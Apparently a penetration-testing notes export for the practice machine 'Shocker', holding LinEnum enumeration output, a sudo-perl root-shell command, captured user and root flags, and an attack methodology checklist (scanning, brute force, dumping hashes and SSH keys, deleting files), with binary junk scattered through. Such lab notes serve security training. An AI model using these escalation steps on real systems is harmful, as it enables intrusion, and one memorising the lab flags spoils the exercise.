4.0K Apr 12 2016 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants -rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service -rw-r--r-- 1 root root 251 Apr 5 2016 cron.service -rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service -rw-r--r-- 1 root root 225 Mar 31 2016 apport-forward.socket -rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service -rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service -rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket -rw-r--r-- 1 root root J115 Feb 9 2016 acpid.path -rw-r--r-- 1 root root 169 Jan 14 2016 atd.service -rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service -rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service -rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service -rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service -rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer -rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 24 Sep 13 2017 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 31 Sep 13 2017 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/Ksystemd/system/kexec.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 29 Sep 13 2017 plymouth-quit-wait.service -> ../plymouth-quit-wait.service lrwxrwxrwx 1 root root 24 Sep 13 2017 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx 1 root root 15 Jul 18 2017 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Jul 18 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Jul 18 2017 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Jul 18 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Jul 18 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service /lib/systemd/system/poweroff.target.wants: total 0 lLrwxrwxrwx 1 root root 28 Sep 13 2017 plymouth-poweroff.service -> ../plymouth-poweroff.service lrwxrwxrwx 1 root root 39 Jul 18 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 26 Sep 13 2017 plymouth-reboot.service -> ../plymouth-reboot.service lrwxrwxrwx 1 root root 39 Jul 18 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 30 Sep 13 2017 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 30 Jul 18 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 31 Jul 18 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 24 Jul 18 2017 systemd-udevd.service -> ../syMstemd-udevd.service lrwxrwxrwx 1 root root 20 Jul 18 2017 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 22 Jul 18 2017 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Jul 18 2017 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Jul 18 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Jul 18 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Jul 18 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Jul 18 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Jul 18 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Jul 18 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Jul 18 2017 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root rootN 32 Jul 18 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 27 Jul 18 2017 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 36 Jul 18 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Jul 18 2017 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Jul 18 2017 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Jul 18 2017 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Jul 18 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Jul 18 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 30 Jul 18 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service lrwxrwxrwx 1 root root 24 Feb 1 2017 console-setup.service -> ../console-setup.Oservice lrwxrwxrwx 1 root root 25 Feb 1 2017 keyboard-setup.service -> ../keyboard-setup.service lrwxrwxrwx 1 root root 19 Feb 1 2017 setvtrgb.service -> ../setvtrgb.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 31 Jul 18 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Jul 18 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 25 Jul 18 2017 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Jul 18 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Jul 18 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Jul 18 2017 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Jul 18 2017 gettyP-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 18 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Jul 18 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 18 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/resolvconf.service.wants: total 0 lrwxrwxrwx 1 root root 42 Jul 18 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path /lib/systemd/system/sigpwr.target.wants: total 0 lrwxrwxrwx 1 root root 36 Jul 18 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Jul 18 2017 systemd-tmpfiles-clean.timer -> Q../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: total 4.0K -rw-r--r-- 1 root root 290 Jul 5 2017 debian.conf /lib/systemd/system/systemd-timesyncd.service.d: total 4.0K -rw-r--r-- 1 root root 251 Jul 5 2017 disable-with-time-daemon.conf /lib/systemd/system/busnames.target.wants: total 0 /lib/systemd/system/systemd-resolved.service.d: total 4.0K -rw-r--r-- 1 root root 200 Jul 17 2017 resolvconf.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/network: total 12K -rw-r--r-- 1 root root 404 Jul 18 2017 80-container-host0.network -rw-r--r-- 1 root root 482 Jul 18 2017 80-container-ve.network -rw-r--r-- 1 root root 80 Jul 18 2017 99-default.link /lib/systemd/system-generators: total 680K -rwxr-xr-x 1 root root 71K Jul 18 2017 systemd-cryptseRtup-generator -rwxr-xr-x 1 root root 59K Jul 18 2017 systemd-dbus1-generator -rwxr-xr-x 1 root root 43K Jul 18 2017 systemd-debug-generator -rwxr-xr-x 1 root root 79K Jul 18 2017 systemd-fstab-generator -rwxr-xr-x 1 root root 39K Jul 18 2017 systemd-getty-generator -rwxr-xr-x 1 root root 119K Jul 18 2017 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 39K Jul 18 2017 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 39K Jul 18 2017 systemd-insserv-generator -rwxr-xr-x 1 root root 35K Jul 18 2017 systemd-rc-local-generator -rwxr-xr-x 1 root root 31K Jul 18 2017 systemd-system-update-generator -rwxr-xr-x 1 root root 103K Jul 18 2017 systemd-sysv-generator -rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 869 Jul 18 2017 90-systemd.preset /lib/systemd/system-sleep: total 4.0K -rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm /lib/systemd/system-shutdown: total 0 ### SOFTWARE ##########################S################### [-] Sudo version: Sudo version 1.8.16 [-] Apache version: Server version: Apache/2.4.18 (Ubuntu) Server built: 2017-09-18T15:09:02 [-] Apache user configuration: APACHE_RUN_USER=shelly APACHE_RUN_GROUP=shelly [-] Installed Apache modules: Loaded Modules: core_module (static) so_module (static) watchdog_module (static) http_module (static) log_config_module (static) logio_module (static) version_module (static) unixd_module (static) access_compat_module (shared) alias_module (shared) auth_basic_module (shared) authn_core_module (shared) authn_file_module (shared) authz_core_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) cgid_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) filter_module (shared) mime_module (shared) mpm_event_module (shared) negotiation_module (shared) setenvif_module (shared) status_module (shared) ### INTERESTING FILES ##################################T## [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/curl [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1567 Sep 22 2017 /etc/passwd -rw-r--r-- 1 root root 801 Sep 22 2017 /etc/group -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile -rw-r----- 1 root shadow 1041 Sep 22 2017 /etc/shadow [-] SUID files: -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 81672 Aug 31 2017 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root rootU 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mount [-] SGID files: -rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 roVot tty 27368 Jun 14 2017 /usr/bin/wall -rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry -rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab -rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate -rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage -rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write -rwxr-sr-x 1 root ssh 358624 Mar 16 2017 /usr/bin/ssh-agent [+] Files with POSIX capabilities set: /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr = cap_net_raw+ep /usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 350 Sep 22 2017W /etc/popularity-contest.conf -rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf -rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf -rw-r--r-- 1 root root 2084 Sep 6 2015 /etc/sysctl.conf -rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf -rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf -rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf -rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf -rw-r--r-- 1 root root 7788 Sep 22 2017 /etc/ca-certificates.conf -rw-r--r-- 1 root root 144 Sep 22 2017 /etc/kernel-img.conf -rw-r--r-- 1 root root 3028 Jul 19 2016 /etc/adduser.conf -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf -rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf -rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf -rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf -rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf -rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf -rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf -rw-r--r-- 1 root root 6816 May 11 2017 /etc/overlayroot.conf -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf -rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf [-] Current user's history files: -rw------- 1 root root 0 Sep 25 2017 /home/shelly/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/shelly/.bash_history [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Jul 19 2016 . drwxr-xr-x 14 root root 4096 Sep 22 2017 .. [+] We're a member of the (lxd) group - could possibly misuse these rights! uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) ### SCAN COMPLETE #################################### custom-colorsXAIZ|xA0o   Z)G'  Script Results######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Disabled Scan started at: Thu Jul 16 16:53:02 EDT 2020  X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^L+;'   Priv EscalationService Exploited: NOPASSWORD Vulnerability Type: sudo Exploit POC: Description: Discovery of Vulnerability LinEnum output : User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl Exploit Code Used sudo /usr/bin/perl -e 'exec "/bin/sh"' Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA0X)c'  Scheduled JobsScheduled Taskscustom-colors$ANl / /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xI/1'  Proof\Flags\OtherUser - Shelly - 2ec24e11320026d1e70ff3e16695b233 Root - 52c2715605d70c7619030560dc1ca467custom-colors$A0i'  Passwordscustom-colors$A?'!f'   Hashescustom-colors$A?&&g'  Goodiescustom-colorsVA?& c^ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipa_ddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., [[h  ' Log Bookcustom-colors(AI^ɚ(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree